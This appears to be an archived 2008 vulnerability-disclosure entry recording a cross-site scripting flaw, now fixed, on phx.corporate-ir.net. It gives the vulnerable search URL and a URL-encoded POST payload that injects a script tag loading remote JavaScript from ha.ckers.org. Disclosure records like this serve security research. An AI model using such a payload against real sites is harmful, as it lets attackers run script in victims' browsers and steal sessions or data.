Security researcher mox, has submitted on 24/03/2008 a cross-site-scripting (XSS) vulnerability affecting phx.corporate-ir.net, which at the time of submission ranked 5412 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 28/04/2008. It is currently fixed. |
Date submitted: 24/03/2008 |
Date published: 28/04/2008 |
Date fixed: 23/06/2008 | Status: FIXED |
Author: mox |
Domain: phx.corporate-ir.net |
Category: XSS |
Pagerank: 5412 |
URL: http://phx.corporate-ir.net/phoenix.zhtml?c=176060&p=irol-newsSearchResult&t=Search&control_ir-finan cialnewsradioon=&control_ir-financialnewsradiooff=&control_ir-financialnewshidden=&control_ir-financ ialnewsdescr=&control_ir-financialnewscheckbox=&control_alertsjs=&control_ir-secradioon=&control_ir- secradiooff=&control_ir-secdescr=&control_ir-rptradioon=&control_ir-rptradiooff=&control_ir-rptdescr =&control_ir-quoteradioon=&control_ir-quoteradiooff=&control_ir-quotedescr=&control_ir-quotecheckbox =&control_ir-presentationradioon=&control_ir-presentationradiooff=&control_ir-presentationdescr=&con trol_ir-newsradioon=&control_ir-newsradiooff=&control_ir-newsdescr=&control_ir-mediaradioon=&control _ir-mediaradiooff=&control_ir-mediadescr=&control_ir-governanceradioon=&control_ir-governanceradioof f=&control_ir-governancedescr=&control_ir-eventradioon=&control_ir-eventradiooff=&control_ir-eventde scr=&control_ir-eodsecradioon=&control_ir-eodsecradiooff=&control_ir-eodsecdescr=&control_ir-eodsecc heckbox=&control_alertzip=&control_alerttitle=&control_alertstate=&control_alertphone=&control_alert mname=&control_alertlname=&control_alertfname=&control_alertfax=&control_alertextension=&control_ale rtcountry=&control_alertcompany=&control_alertcity=&control_alertaddr2=&control_alertaddr1= |
POST: control_SearchBox=%22%2F%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3F%2F%3E&Submit=Search |
Click here to view the mirror
|
|
|